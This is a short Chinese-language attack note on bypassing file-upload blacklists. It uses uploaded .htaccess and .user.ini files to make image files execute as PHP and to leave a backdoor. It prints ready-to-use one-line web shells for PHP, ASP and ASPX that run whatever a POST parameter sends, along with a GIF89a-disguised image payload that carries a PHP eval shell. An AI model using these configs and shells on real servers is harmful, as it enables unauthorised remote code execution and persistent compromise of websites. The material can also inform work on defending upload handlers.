1、.htaccess文件
文件上传:
一般.htaccess可以用来留后门和针对黑名单绕过
文件另存为.htaccess写入:
AddType application/x-httpd-php .png //png文件解析为php文件
上传.htaccess 必须是网站根路径
留后门:
可以在.htaccess 加入php解析规则
类似于把文件名包含1的解析成php
<FilesMatch "1">
SetHandler application/x-httpd-php
</FilesMatch>
filename.png 就会以php执行
以上两种方法执行后创建png文件写入一句话木马或者其他木马就可以创建连接。
php的一句话木马: <?php @eval($_POST['pass']);?>
asp的一句话是: <%eval request ("pass")%>
aspx的一句话是: <%@ Page Language="Jscript"%> <%eval(Request.Item["pass"],"unsafe");%>
2、.user.ini文件
使用条件:
(1)服务器脚本语言为PHP
(2)对应目录下面有可执行的php文件
(3)服务器使用CGI/FastCGI模式
.user.ini.它比.htaccess用的更广,不管是nginx/apache/IIS,只要是以fastcgi运行的php都可以用这个方法。
实例:上传.user.ini绕过黑名单检验
GIF89a //绕过exif_imagetype()
auto_prepend_file=a.jpg //指定在主文件之前自动解析的文件的名称,并包含该文件,就像使用require函数调用它一样。
auto_append_file=a.jpg //解析后进行包含
优势:跟.htaccess后门比,适用范围更广,nginx/apache/IIS都有效,而.htaccess只适用于apache
操作
首先,构造一个.user.ini文件,内容如下:
GIF89a
auto_prepend_file=a.jpg
然后构造一个a.jpg,内容如下:
GIF89a
<script language='php'> @eval($_POST['pass']);</script>
然后将两个文件分别上传到服务器上,拿到回显。